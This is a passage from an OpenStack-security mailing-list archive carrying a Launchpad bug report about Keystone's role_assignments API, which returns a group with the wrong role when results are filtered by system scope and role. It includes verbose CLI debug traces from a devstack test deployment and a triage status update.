plugin password selected auth_config_hook(): {'auth_type': 'password', 'beta_command': False, u'image_status_code_retries': '5', 'cacert': None, u'network_api_version': u'2', u'message': u'', u'image_format': u'qcow2', 'networks': [], 'cloud': 'devstack-system-admin', 'verify': True, u'object_store_api_version': u'1', u'status': u'active', 'verbose_level': 3, 'region_name': 'RegionOne', u'baremetal_introspection_status_code_retries': '5', 'api_timeout': None, 'auth': {'username': 'admin', 'system_scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'}, 'default_domain': 'default', u'image_api_use_tasks': False, u'floating_ip_source': u'neutron', 'key': None, 'timing': False, 'key_manager_api_version': '1', u'baremetal_status_code_retries': '5', 'identity_api_version': '3', 'volume_api_version': '3', 'deferred_help': False, 'cert': None, u'secgroup_source': u'neutron', 'debug': True, u'interface': 'public', u'disable_vendor_agent': {}} Auth plugin password selected auth_config_hook(): {'auth_type': 'password', 'beta_command': False, u'image_status_code_retries': '5', 'cacert': None, u'network_api_version': u'2', u'message': u'', u'image_format': u'qcow2', 'networks': [], 'cloud': 'devstack-system-admin', 'verify': True, u'object_store_api_version': u'1', u'status': u'active', 'verbose_level': 3, 'region_name': 'RegionOne', u'baremetal_introspection_status_code_retries': '5', 'api_timeout': None, 'auth': {'username': 'admin', 'system_scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'}, 'default_domain': 'default', u'image_api_use_tasks': False, u'floating_ip_source': u'neutron', 'key': None, 'timing': False, 'key_manager_api_version': '1', u'baremetal_status_code_retries': '5', 'identity_api_version': '3', 'volume_api_version': '3', 'deferred_help': False, 'cert': None, u'secgroup_source': u'neutron', 'debug': True, u'interface': 'public', u'disable_vendor_agent': {}} command: role assignment list -> openstackclient.identity.v3.role_assignment.ListRoleAssignment (auth=True) Auth plugin password selected auth_config_hook(): {'auth_type': 'password', 'beta_command': False, u'image_status_code_retries': '5', 'timing': False, 'additional_user_agent': [('osc-lib', '1.13.0')], u'network_api_version': u'2', u'message': u'', u'image_format': u'qcow2', 'networks': [], 'cloud': 'devstack-system-admin', 'verify': True, u'object_store_api_version': u'1', u'status': u'active', 'verbose_level': 3, 'region_name': 'RegionOne', u'baremetal_introspection_status_code_retries': '5', 'api_timeout': None, 'auth': {'username': 'admin', 'system_scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'}, 'default_domain': 'default', u'image_api_use_tasks': False, u'floating_ip_source': u'neutron', 'key': None, u'interface': 'public', 'cacert': None, 'key_manager_api_version': '1', u'baremetal_status_code_retries': '5', 'identity_api_version': '3', 'volume_api_version': '3', 'deferred_help': False, 'cert': None, u'secgroup_source': u'neutron', 'debug': True, u'disable_vendor_agent': {}} Using auth plugin: password Using parameters {'username': 'admin', 'system_scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'} Get auth_ref REQ: curl -g -i -X GET http://10.0.3.122/identity -H "Accept: application/json" -H "User-Agent: openstacksdk/0.34.0 keystoneauth1/3.17.0 python-requests/2.22.0 CPython/2.7.15+" Starting new HTTP connection (1): 10.0.3.122:80 http://10.0.3.122:80 "GET /identity HTTP/1.1" 300 269 RESP: [300] Connection: close Content-Length: 269 Content-Type: application/json Date: Fri, 04 Oct 2019 18:56:29 GMT Location: http://10.0.3.122/identity/v3/ Server: Apache/2.4.29 (Ubuntu) Vary: X-Auth-Token x-openstack-request-id: req-f35dcb91-9d9f-4c85-9421-1600e6a6ec27 RESP BODY: {"versions": {"values": [{"status": "stable", "updated": "2019-07-19T00:00:00Z", "media-types": [{"base": "application/json", "type": "application/vnd.openstack.identity-v3+json"}], "id": "v3.13", "links": [{"href": "http://10.0.3.122/identity/v3/", "rel": "self"}]}]}} GET call to http://10.0.3.122/identity used request id req-f35dcb91-9d9f-4c85-9421-1600e6a6ec27 Making authentication request to http://10.0.3.122/identity/v3/auth/tokens Resetting dropped connection: 10.0.3.122 http://10.0.3.122:80 "POST /identity/v3/auth/tokens HTTP/1.1" 201 1194 {"token": {"methods": ["password"], "roles": [{"id": "7a11d0ba747046d7936fbb8f97dc5cb1", "name": "admin"}, {"id": "a8cd98f2e98d4135b2fa83950d6171ec", "name": "member"}, {"id": "7ee093f4ccf345bba963ce765f9b797f", "name": "reader"}], "system": {"all": true}, "expires_at": "2019-10-04T19:56:29.000000Z", "catalog": [{"endpoints": [{"url": "http://10.0.3.122/image", "interface": "public", "region": "RegionOne", "region_id": "RegionOne", "id": "279159944f0843179bb376b4a7ac5c45"}], "type": "image", "id": "24305f1e70ec474d895e409f4b339f18", "name": "glance"}, {"endpoints": [{"url": "http://10.0.3.122/identity", "interface": "admin", "region": "RegionOne", "region_id": "RegionOne", "id": "5ba5cca8ad654f5ea9d633321893d620"}, {"url": "http://10.0.3.122/identity", "interface": "public", "region": "RegionOne", "region_id": "RegionOne", "id": "f3b136a56d1a4839bd1bc50a070f8f86"}], "type": "identity", "id": "da3d368b566b4a9686ddadbb64004c26", "name": "keystone"}], "user": {"domain": {"id": "default", "name": "Default"}, "password_expires_at": null, "name": "admin", "id": "0ec0eb48c66d4fb79c432a2ff8c5d257"}, "audit_ids": ["JVQCRxBoTUyzm2CqiCoj6w"], "issued_at": "2019-10-04T18:56:29.000000Z"}} run(Namespace(authproject=False, authuser=False, columns=[], domain=None, effective=False, fit_width=False, formatter='table', group=None, group_domain=None, inherited=False, max_width=0, names=True, noindent=False, print_empty=False, project=None, project_domain=None, quote_mode='nonnumeric', role=None, role_domain=None, sort_columns=[], system=u'all', user=None, user_domain=None)) Instantiating identity client: Making authentication request to http://10.0.3.122/identity/v3/auth/tokens Resetting dropped connection: 10.0.3.122 http://10.0.3.122:80 "POST /identity/v3/auth/tokens HTTP/1.1" 201 1194 {"token": {"methods": ["password"], "roles": [{"id": "7a11d0ba747046d7936fbb8f97dc5cb1", "name": "admin"}, {"id": "a8cd98f2e98d4135b2fa83950d6171ec", "name": "member"}, {"id": "7ee093f4ccf345bba963ce765f9b797f", "name": "reader"}], "system": {"all": true}, "expires_at": "2019-10-04T19:56:29.000000Z", "catalog": [{"endpoints": [{"url": "http://10.0.3.122/image", "interface": "public", "region": "RegionOne", "region_id": "RegionOne", "id": "279159944f0843179bb376b4a7ac5c45"}], "type": "image", "id": "24305f1e70ec474d895e409f4b339f18", "name": "glance"}, {"endpoints": [{"url": "http://10.0.3.122/identity", "interface": "admin", "region": "RegionOne", "region_id": "RegionOne", "id": "5ba5cca8ad654f5ea9d633321893d620"}, {"url": "http://10.0.3.122/identity", "interface": "public", "region": "RegionOne", "region_id": "RegionOne", "id": "f3b136a56d1a4839bd1bc50a070f8f86"}], "type": "identity", "id": "da3d368b566b4a9686ddadbb64004c26", "name": "keystone"}], "user": {"domain": {"id": "default", "name": "Default"}, "password_expires_at": null, "name": "admin", "id": "0ec0eb48c66d4fb79c432a2ff8c5d257"}, "audit_ids": ["U9Z3md9YTP-9-bTLuPDIzg"], "issued_at": "2019-10-04T18:56:29.000000Z"}} REQ: curl -g -i -X GET http://10.0.3.122/identity/v3/role_assignments?scope.system=all&include_names=True -H "Accept: application/json" -H "User-Agent: python-keystoneclient" -H "X-Auth-Token: {SHA256}042443671367aa0183e15fd2692bf4c70d15050bdac46db883fd836440ae1065" Resetting dropped connection: 10.0.3.122 http://10.0.3.122:80 "GET /identity/v3/role_assignments?scope.system=all&include_names=True HTTP/1.1" 200 2401 RESP: [200] Connection: close Content-Length: 2401 Content-Type: application/json Date: Fri, 04 Oct 2019 18:56:29 GMT Server: Apache/2.4.29 (Ubuntu) Vary: X-Auth-Token x-openstack-request-id: req-c9bf133b-7ec4-49a5-b9da-3185dc6c55d2 RESP BODY: {"role_assignments": [{"scope": {"system": {"all": true}}, "role": {"id": "7a11d0ba747046d7936fbb8f97dc5cb1", "name": "admin"}, "group": {"domain": {"id": "default", "name": "Default"}, "id": "c814cd4739bd4960ad08ade3814f1560", "name": "system-admins"}, "links": {"assignment": "http://10.0.3.122/identity/v3/system/groups/c814cd4739bd4960ad08ade3814f1560/roles/7a11d0ba747046d7936fbb8f97dc5cb1"}}, {"scope": {"system": {"all": true}}, "role": {"id": "7ee093f4ccf345bba963ce765f9b797f", "name": "reader"}, "group": {"domain": {"id": "default", "name": "Default"}, "id": "dd97034049fd46a6bdb33a32f1c7759e", "name": "system-auditors"}, "links": {"assignment": "http://10.0.3.122/identity/v3/system/groups/dd97034049fd46a6bdb33a32f1c7759e/roles/7ee093f4ccf345bba963ce765f9b797f"}}, {"scope": {"system": {"all": true}}, "role": {"id": "7a11d0ba747046d7936fbb8f97dc5cb1", "name": "admin"}, "user": {"domain": {"id": "default", "name": "Default"}, "id": "0ec0eb48c66d4fb79c432a2ff8c5d257", "name": "admin"}, "links": {"assignment": "http://10.0.3.122/identity/v3/system/users/0ec0eb48c66d4fb79c432a2ff8c5d257/roles/7a11d0ba747046d7936fbb8f97dc5cb1"}}, {"scope": {"system": {"all": true}}, "role": {"id": "7a11d0ba747046d7936fbb8f97dc5cb1", "name": "admin"}, "user": {"domain": {"id": "default", "name": "Default"}, "id": "0f75914e63cb46e795cae7e6facd0ecb", "name": "operator"}, "links": {"assignment": "http://10.0.3.122/identity/v3/system/users/0f75914e63cb46e795cae7e6facd0ecb/roles/7a11d0ba747046d7936fbb8f97dc5cb1"}}, {"scope": {"system": {"all": true}}, "role": {"id": "a8cd98f2e98d4135b2fa83950d6171ec", "name": "member"}, "user": {"domain": {"id": "default", "name": "Default"}, "id": "66256692b6b942a8814ffd87d32a3963", "name": "system-support"}, "links": {"assignment": "http://10.0.3.122/identity/v3/system/users/66256692b6b942a8814ffd87d32a3963/roles/a8cd98f2e98d4135b2fa83950d6171ec"}}, {"scope": {"system": {"all": true}}, "role": {"id": "7ee093f4ccf345bba963ce765f9b797f", "name": "reader"}, "user": {"domain": {"id": "default", "name": "Default"}, "id": "e8fec49e15984aedb5e1235f279434fe", "name": "auditor"}, "links": {"assignment": "http://10.0.3.122/identity/v3/system/users/e8fec49e15984aedb5e1235f279434fe/roles/7ee093f4ccf345bba963ce765f9b797f"}}], "links": {"self": "http://10.0.3.122/identity/v3/role_assignments?scope.system=all&include_names=True", "previous": null, "next": null}} GET call to identity for http://10.0.3.122/identity/v3/role_assignments?scope.system=all&include_names=True used request id req-c9bf133b-7ec4-49a5-b9da-3185dc6c55d2 +--------+------------------------+-------------------------+---------+--------+--------+-----------+ | Role | User | Group | Project | Domain | System | Inherited | +--------+------------------------+-------------------------+---------+--------+--------+-----------+ | admin | | system-admins at Default | | | all | False | | reader | | system-auditors at Default | | | all | False | | admin | admin at Default | | | | all | False | | admin | operator at Default | | | | all | False | | member | system-support at Default | | | | all | False | | reader | auditor at Default | | | | all | False | +--------+------------------------+-------------------------+---------+--------+--------+-----------+ clean_up ListRoleAssignment: END return value: 0 The Trace above lists all system role assignments to confirm my setup locally. The following trace shows that the group is returned with the wrong role assignment based on the filter. $ openstack role assignment list --names --system all --role member --debug [1/880] START with options: role assignment list --names --system all --role member --debug options: Namespace(access_key='', access_secret='***', access_token='***', access_token_endpoint='', access_token_type='', application_credential_id='', application_credential_name='', application_credential_secret='***', auth_methods='',  auth_type='', auth_url='', cacert=None, cert='', client_id='', client_secret='***', cloud='devstack-system-admin', code='', consumer_key='', consumer_secret='***', debug=True, default_domain='default', default_domain_id='', default_domai n_name='', deferred_help=False, discovery_endpoint='', domain_id='', domain_name='', endpoint='', identity_provider='', identity_provider_url='', insecure=None, interface='public', key='', log_file=None, openid_scope='', os_beta_command=F alse, os_compute_api_version='', os_identity_api_version='', os_image_api_version='', os_key_manager_api_version='1', os_network_api_version='', os_object_api_version='', os_project_id=None, os_project_name=None, os_volume_api_version='',  passcode='', password='***', profile='', project_domain_id='', project_domain_name='', project_id='', project_name='', protocol='', redirect_uri='', region_name='', remote_project_domain_id='', remote_project_domain_name='', remote_proje ct_id='', remote_project_name='', service_provider='', service_provider_endpoint='', service_provider_entity_id='', system_scope='', timing=False, token='***', trust_id='', url='', user_domain_id='', user_domain_name='', user_id='', usern ame='', verbose_level=3, verify=None) Auth plugin password selected auth_config_hook(): {'auth_type': 'password', 'beta_command': False, u'image_status_code_retries': '5', 'cacert': None, u'network_api_version': u'2', u'message': u'', u'image_format': u'qcow2', 'networks': [], 'cloud': 'devstack-system-ad min', 'verify': True, u'object_store_api_version': u'1', u'status': u'active', 'verbose_level': 3, 'region_name': 'RegionOne', u'baremetal_introspection_status_code_retries': '5', 'api_timeout': None, 'auth': {'username': 'admin', 'system _scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'}, 'default_domain': 'default', u'image_api_use_tasks': False, u'floating_ip_source': u'neutron', 'key ': None, 'timing': False, 'key_manager_api_version': '1', u'baremetal_status_code_retries': '5', 'identity_api_version': '3', 'volume_api_version': '3', 'deferred_help': False, 'cert': None, u'secgroup_source': u'neutron', 'debug': True, u'interface': 'public', u'disable_vendor_agent': {}} defaults: {u'auth_type': 'password', u'status': u'active', u'image_status_code_retries': 5, u'baremetal_introspection_status_code_retries': 5, 'api_timeout': None, 'cacert': None, u'image_api_use_tasks': False, u'floating_ip_source': u'ne utron', 'key': None, u'interface': u'public', u'network_api_version': u'2', u'message': u'', u'image_format': u'qcow2', u'baremetal_status_code_retries': 5, 'verify': True, 'cert': None, u'secgroup_source': u'neutron', u'object_store_api_ version': u'1', u'disable_vendor_agent': {}} cloud cfg: {'auth_type': 'password', 'beta_command': False, u'image_status_code_retries': '5', 'cacert': None, u'network_api_version': u'2', u'message': u'', u'image_format': u'qcow2', 'networks': [], 'cloud': 'devstack-system-admin', 've rify': True, u'object_store_api_version': u'1', u'status': u'active', 'verbose_level': 3, 'region_name': 'RegionOne', u'baremetal_introspection_status_code_retries': '5', 'api_timeout': None, 'auth': {'username': 'admin', 'system_scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'}, 'default_domain': 'default', u'image_api_use_tasks': False, u'floating_ip_source': u'neutron', 'key': None, 'timing': False, 'key_manager_api_version': '1', u'baremetal_status_code_retries': '5', 'identity_api_version': '3', 'volume_api_version': '3', 'deferred_help': False, 'cert': None, u'secgroup_source': u'neutron', 'debug': True, u'interfa ce': 'public', u'disable_vendor_agent': {}} compute API version 2.1, cmd group openstack.compute.v2 network API version 2, cmd group openstack.network.v2 image API version 2, cmd group openstack.image.v2 volume API version 3, cmd group openstack.volume.v3 identity API version 3, cmd group openstack.identity.v3 object_store API version 1, cmd group openstack.object_store.v1 key_manager API version 1, cmd group openstack.key_manager.v1 Auth plugin password selected auth_config_hook(): {'auth_type': 'password', 'beta_command': False, u'image_status_code_retries': '5', 'cacert': None, u'network_api_version': u'2', u'message': u'', u'image_format': u'qcow2', 'networks': [], 'cloud': 'devstack-system-ad min', 'verify': True, u'object_store_api_version': u'1', u'status': u'active', 'verbose_level': 3, 'region_name': 'RegionOne', u'baremetal_introspection_status_code_retries': '5', 'api_timeout': None, 'auth': {'username': 'admin', 'system _scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'}, 'default_domain': 'default', u'image_api_use_tasks': False, u'floating_ip_source': u'neutron', 'key ': None, 'timing': False, 'key_manager_api_version': '1', u'baremetal_status_code_retries': '5', 'identity_api_version': '3', 'volume_api_version': '3', 'deferred_help': False, 'cert': None, u'secgroup_source': u'neutron', 'debug': True, u'interface': 'public', u'disable_vendor_agent': {}} Auth plugin password selected auth_config_hook(): {'auth_type': 'password', 'beta_command': False, u'image_status_code_retries': '5', 'cacert': None, u'network_api_version': u'2', u'message': u'', u'image_format': u'qcow2', 'networks': [], 'cloud': 'devstack-system-ad min', 'verify': True, u'object_store_api_version': u'1', u'status': u'active', 'verbose_level': 3, 'region_name': 'RegionOne', u'baremetal_introspection_status_code_retries': '5', 'api_timeout': None, 'auth': {'username': 'admin', 'system _scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'}, 'default_domain': 'default', u'image_api_use_tasks': False, u'floating_ip_source': u'neutron', 'key ': None, 'timing': False, 'key_manager_api_version': '1', u'baremetal_status_code_retries': '5', 'identity_api_version': '3', 'volume_api_version': '3', 'deferred_help': False, 'cert': None, u'secgroup_source': u'neutron', 'debug': True, u'interface': 'public', u'disable_vendor_agent': {}} command: role assignment list -> openstackclient.identity.v3.role_assignment.ListRoleAssignment (auth=True) Auth plugin password selected auth_config_hook(): {'auth_type': 'password', 'beta_command': False, u'image_status_code_retries': '5', 'timing': False, 'additional_user_agent': [('osc-lib', '1.13.0')], u'network_api_version': u'2', u'message': u'', u'image_format': u'q cow2', 'networks': [], 'cloud': 'devstack-system-admin', 'verify': True, u'object_store_api_version': u'1', u'status': u'active', 'verbose_level': 3, 'region_name': 'RegionOne', u'baremetal_introspection_status_code_retries': '5', 'api_ti meout': None, 'auth': {'username': 'admin', 'system_scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'}, 'default_domain': 'default', u'image_api_use_tas ks': False, u'floating_ip_source': u'neutron', 'key': None, u'interface': 'public', 'cacert': None, 'key_manager_api_version': '1', u'baremetal_status_code_retries': '5', 'identity_api_version': '3', 'volume_api_version': '3', 'deferred_h elp': False, 'cert': None, u'secgroup_source': u'neutron', 'debug': True, u'disable_vendor_agent': {}} Using auth plugin: password Using parameters {'username': 'admin', 'system_scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'} Get auth_ref REQ: curl -g -i -X GET http://10.0.3.122/identity -H "Accept: application/json" -H "User-Agent: openstacksdk/0.34.0 keystoneauth1/3.17.0 python-requests/2.22.0 CPython/2.7.15+" Starting new HTTP connection (1): 10.0.3.122:80 http://10.0.3.122:80 "GET /identity HTTP/1.1" 300 269 RESP: [300] Connection: close Content-Length: 269 Content-Type: application/json Date: Fri, 04 Oct 2019 18:56:49 GMT Location: http://10.0.3.122/identity/v3/ Server: Apache/2.4.29 (Ubuntu) Vary: X-Auth-Token x-openstack-request-id: req-d5 784d4c-7b47-4647-b912-65e6a78b835e RESP BODY: {"versions": {"values": [{"status": "stable", "updated": "2019-07-19T00:00:00Z", "media-types": [{"base": "application/json", "type": "application/vnd.openstack.identity-v3+json"}], "id": "v3.13", "links": [{"href": "http://10. 0.3.122/identity/v3/", "rel": "self"}]}]}} GET call to http://10.0.3.122/identity used request id req-d5784d4c-7b47-4647-b912-65e6a78b835e Making authentication request to http://10.0.3.122/identity/v3/auth/tokens Resetting dropped connection: 10.0.3.122 http://10.0.3.122:80 "POST /identity/v3/auth/tokens HTTP/1.1" 201 1194 {"token": {"methods": ["password"], "roles": [{"id": "7a11d0ba747046d7936fbb8f97dc5cb1", "name": "admin"}, {"id": "a8cd98f2e98d4135b2fa83950d6171ec", "name": "member"}, {"id": "7ee093f4ccf345bba963ce765f9b797f", "name": "reader"}], "syste m": {"all": true}, "expires_at": "2019-10-04T19:56:49.000000Z", "catalog": [{"endpoints": [{"url": "http://10.0.3.122/image", "interface": "public", "region": "RegionOne", "region_id": "RegionOne", "id": "279159944f0843179bb376b4a7ac5c45" }], "type": "image", "id": "24305f1e70ec474d895e409f4b339f18", "name": "glance"}, {"endpoints": [{"url": "http://10.0.3.122/identity", "interface": "admin", "region": "RegionOne", "region_id": "RegionOne", "id": "5ba5cca8ad654f5ea9d633321 893d620"}, {"url": "http://10.0.3.122/identity", "interface": "public", "region": "RegionOne", "region_id": "RegionOne", "id": "f3b136a56d1a4839bd1bc50a070f8f86"}], "type": "identity", "id": "da3d368b566b4a9686ddadbb64004c26", "name": "ke ystone"}], "user": {"domain": {"id": "default", "name": "Default"}, "password_expires_at": null, "name": "admin", "id": "0ec0eb48c66d4fb79c432a2ff8c5d257"}, "audit_ids": ["SGRaWT8BTVuzELGwxqjBdg"], "issued_at": "2019-10-04T18:56:49.000000 Z"}} run(Namespace(authproject=False, authuser=False, columns=[], domain=None, effective=False, fit_width=False, formatter='table', group=None, group_domain=None, inherited=False, max_width=0, names=True, noindent=False, print_empty=False, pro ject=None, project_domain=None, quote_mode='nonnumeric', role=u'member', role_domain=None, sort_columns=[], system=u'all', user=None, user_domain=None)) Instantiating identity client: Making authentication request to http://10.0.3.122/identity/v3/auth/tokens Resetting dropped connection: 10.0.3.122 http://10.0.3.122:80 "POST /identity/v3/auth/tokens HTTP/1.1" 201 1194 {"token": {"methods": ["password"], "roles": [{"id": "7a11d0ba747046d7936fbb8f97dc5cb1", "name": "admin"}, {"id": "a8cd98f2e98d4135b2fa83950d6171ec", "name": "member"}, {"id": "7ee093f4ccf345bba963ce765f9b797f", "name": "reader"}], "syste m": {"all": true}, "expires_at": "2019-10-04T19:56:50.000000Z", "catalog": [{"endpoints": [{"url": "http://10.0.3.122/image", "interface": "public", "region": "RegionOne", "region_id": "RegionOne", "id": "279159944f0843179bb376b4a7ac5c45" }], "type": "image", "id": "24305f1e70ec474d895e409f4b339f18", "name": "glance"}, {"endpoints": [{"url": "http://10.0.3.122/identity", "interface": "admin", "region": "RegionOne", "region_id": "RegionOne", "id": "5ba5cca8ad654f5ea9d633321 893d620"}, {"url": "http://10.0.3.122/identity", "interface": "public", "region": "RegionOne", "region_id": "RegionOne", "id": "f3b136a56d1a4839bd1bc50a070f8f86"}], "type": "identity", "id": "da3d368b566b4a9686ddadbb64004c26", "name": "ke ystone"}], "user": {"domain": {"id": "default", "name": "Default"}, "password_expires_at": null, "name": "admin", "id": "0ec0eb48c66d4fb79c432a2ff8c5d257"}, "audit_ids": ["2nu0u-1wQRmWA9_uS2hZ-g"], "issued_at": "2019-10-04T18:56:50.000000 Z"}} REQ: curl -g -i -X GET http://10.0.3.122/identity/v3/roles/member -H "Accept: application/json" -H "User-Agent: python-keystoneclient" -H "X-Auth-Token: {SHA256}cb5bcba8735c5a7ea6f80ea414ee306e1a0b6a9c0c39c4dbf1296a96f6516ab6" Resetting dropped connection: 10.0.3.122 http://10.0.3.122:80 "GET /identity/v3/roles/member HTTP/1.1" 404 84 RESP: [404] Connection: close Content-Length: 84 Content-Type: application/json Date: Fri, 04 Oct 2019 18:56:50 GMT Server: Apache/2.4.29 (Ubuntu) Vary: X-Auth-Token x-openstack-request-id: req-88bce424-60f2-4d2a-a6f5-2bd256602789 RESP BODY: {"error":{"code":404,"message":"Could not find role: member.","title":"Not Found"}} GET call to identity for http://10.0.3.122/identity/v3/roles/member used request id req-88bce424-60f2-4d2a-a6f5-2bd256602789 Request returned failure status: 404 REQ: curl -g -i -X GET http://10.0.3.122/identity/v3/roles?name=member -H "Accept: application/json" -H "User-Agent: python-keystoneclient" -H "X-Auth-Token: {SHA256}cb5bcba8735c5a7ea6f80ea414ee306e1a0b6a9c0c39c4dbf1296a96f6516ab6" Resetting dropped connection: 10.0.3.122 http://10.0.3.122:80 "GET /identity/v3/roles?name=member HTTP/1.1" 200 322 RESP: [200] Connection: close Content-Length: 322 Content-Type: application/json Date: Fri, 04 Oct 2019 18:56:50 GMT Server: Apache/2.4.29 (Ubuntu) Vary: X-Auth-Token x-openstack-request-id: req-ce429b68-b53d-4c49-9080-ed3da3bce55b RESP BODY: {"links": {"self": "http://10.0.3.122/identity/v3/roles?name=member", "previous": null, "next": null}, "roles": [{"description": null, "links": {"self": "http://10.0.3.122/identity/v3/roles/a8cd98f2e98d4135b2fa83950d6171ec"}, " options": {}, "id": "a8cd98f2e98d4135b2fa83950d6171ec", "domain_id": null, "name": "member"}]} GET call to identity for http://10.0.3.122/identity/v3/roles?name=member used request id req-ce429b68-b53d-4c49-9080-ed3da3bce55b REQ: curl -g -i -X GET http://10.0.3.122/identity/v3/role_assignments?scope.system=all&role.id=a8cd98f2e98d4135b2fa83950d6171ec&include_names=True -H "Accept: application/json" -H "User-Agent: python-keystoneclient" -H "X-Auth-Token: {SHA 256}cb5bcba8735c5a7ea6f80ea414ee306e1a0b6a9c0c39c4dbf1296a96f6516ab6" Resetting dropped connection: 10.0.3.122 http://10.0.3.122:80 "GET /identity/v3/role_assignments?scope.system=all&role.id=a8cd98f2e98d4135b2fa83950d6171ec&include_names=True HTTP/1.1" 200 1328 RESP: [200] Connection: close Content-Length: 1328 Content-Type: application/json Date: Fri, 04 Oct 2019 18:56:50 GMT Server: Apache/2.4.29 (Ubuntu) Vary: X-Auth-Token x-openstack-request-id: req-08f9bdb9-149d-4905-96cc-99b87c8b6339 RESP BODY: {"role_assignments": [{"scope": {"system": {"all": true}}, "role": {"id": "7ee093f4ccf345bba963ce765f9b797f", "name": "reader"}, "group": {"domain": {"id": "default", "name": "Default"}, "id": "dd97034049fd46a6bdb33a32f1c7759e" , "name": "system-auditors"}, "links": {"assignment": "http://10.0.3.122/identity/v3/system/groups/dd97034049fd46a6bdb33a32f1c7759e/roles/7ee093f4ccf345bba963ce765f9b797f"}}, {"scope": {"system": {"all": true}}, "role": {"id": "7a11d0ba74 7046d7936fbb8f97dc5cb1", "name": "admin"}, "user": {"domain": {"id": "default", "name": "Default"}, "id": "0f75914e63cb46e795cae7e6facd0ecb", "name": "operator"}, "links": {"assignment": "http://10.0.3.122/identity/v3/system/users/0f75914 e63cb46e795cae7e6facd0ecb/roles/7a11d0ba747046d7936fbb8f97dc5cb1"}}, {"scope": {"system": {"all": true}}, "role": {"id": "a8cd98f2e98d4135b2fa83950d6171ec", "name": "member"}, "user": {"domain": {"id": "default", "name": "Default"}, "id":  "66256692b6b942a8814ffd87d32a3963", "name": "system-support"}, "links": {"assignment": "http://10.0.3.122/identity/v3/system/users/66256692b6b942a8814ffd87d32a3963/roles/a8cd98f2e98d4135b2fa83950d6171ec"}}], "links": {"self": "http://10. 0.3.122/identity/v3/role_assignments?scope.system=all&role.id=a8cd98f2e98d4135b2fa83950d6171ec&include_names=True", "previous": null, "next": null}} GET call to identity for http://10.0.3.122/identity/v3/role_assignments?scope.system=all&role.id=a8cd98f2e98d4135b2fa83950d6171ec&include_names=True used request id req-08f9bdb9-149d-4905-96cc-99b87c8b6339 +--------+------------------------+-------------------------+---------+--------+--------+-----------+ | Role | User | Group | Project | Domain | System | Inherited | +--------+------------------------+-------------------------+---------+--------+--------+-----------+ | reader | | system-auditors at Default | | | all | False | | admin | operator at Default | | | | all | False | | member | system-support at Default | | | | all | False | +--------+------------------------+-------------------------+---------+--------+--------+-----------+ clean_up ListRoleAssignment: END return value: 0 To manage notifications about this bug go to: https://bugs.launchpad.net/keystone/+bug/1846817/+subscriptions From lbragstad at gmail.com Fri Oct 4 20:22:51 2019 From: lbragstad at gmail.com (Lance Bragstad) Date: Fri, 04 Oct 2019 20:22:51 -0000 Subject: [Openstack-security] [Bug 1846817] Re: v3/role_assignments filtering exposes unnecessary role assignments References: <157021550823.969.5501239713217750813.malonedeb@chaenomeles.canonical.com> Message-ID: <157022057349.22121.11877560251896454973.launchpad@gac.canonical.com> ** Changed in: keystone Status: New => Triaged ** Changed in: keystone Importance: Undecided => Medium -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1846817 Title: v3/role_assignments filtering exposes unnecessary role assignments Status in OpenStack Identity (keystone): Triaged Status in OpenStack Security Advisory: Won't Fix Bug description: I have a deployment that exercises multiple system role assignments:  - An "operator" user has the "admin" role on the system  - A "system-support" user has the "member" role on the system  - A "system-admins" group has the "reader" role on the system If I ask keystone to filter a list of role assignments by --system all and --role member, I should only see a list with the "system-support" user and the "operator" user. Instead, I get a list with three entries that includes the group, which doesn't have the member role at all, it only has reader. Depending on how you classify this, it could leak information to clients. Groups don't appear to be filtered from the list since "reader" doesn't imply "member" (it's the other way around). $ openstack role assignment list --names --system all --debug START with options: role assignment list --names --system all --debug options: Namespace(access_key='', access_secret='***', access_token='***', access_token_endpoint='', access_token_type='', application_credential_id='', application_credential_name='', application_credential_secret='***', auth_methods='', auth_type='', auth_url='', cacert=None, cert='', client_id='', client_secret='***', cloud='devstack-system-admin', code='', consumer_key='', consumer_secret='***', debug=True, default_domain='default', default_domain_id='', default_domain_name='', deferred_help=False, discovery_endpoint='', domain_id='', domain_name='', endpoint='', identity_provider='', identity_provider_url='', insecure=None, interface='public', key='', log_file=None, openid_scope='', os_beta_command=False, os_compute_api_version='', os_identity_api_version='', os_image_api_version='', os_key_manager_api_version='1', os_network_api_version='', os_object_api_version='', os_project_id=None, os_project_name=None, os_volume_api_version='', passcode='', password='***', profile='', project_domain_id='', project_domain_name='', project_id='', project_name='', protocol='', redirect_uri='', region_name='', remote_project_domain_id='', remote_project_domain_name='', remote_project_id='', remote_project_name='', service_provider='', service_provider_endpoint='', service_provider_entity_id='', system_scope='', timing=False, token='***', trust_id='', url='', user_domain_id='', user_domain_name='', user_id='', username='', verbose_level=3, verify=None) Auth plugin password selected auth_config_hook(): {'auth_type': 'password', 'beta_command': False, u'image_status_code_retries': '5', 'cacert': None, u'network_api_version': u'2', u'message': u'', u'image_format': u'qcow2', 'networks': [], 'cloud': 'devstack-system-admin', 'verify': True, u'object_store_api_version': u'1', u'status': u'active', 'verbose_level': 3, 'region_name': 'RegionOne', u'baremetal_introspection_status_code_retries': '5', 'api_timeout': None, 'auth': {'username': 'admin', 'system_scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'}, 'default_domain': 'default', u'image_api_use_tasks': False, u'floating_ip_source': u'neutron', 'key': None, 'timing': False, 'key_manager_api_version': '1', 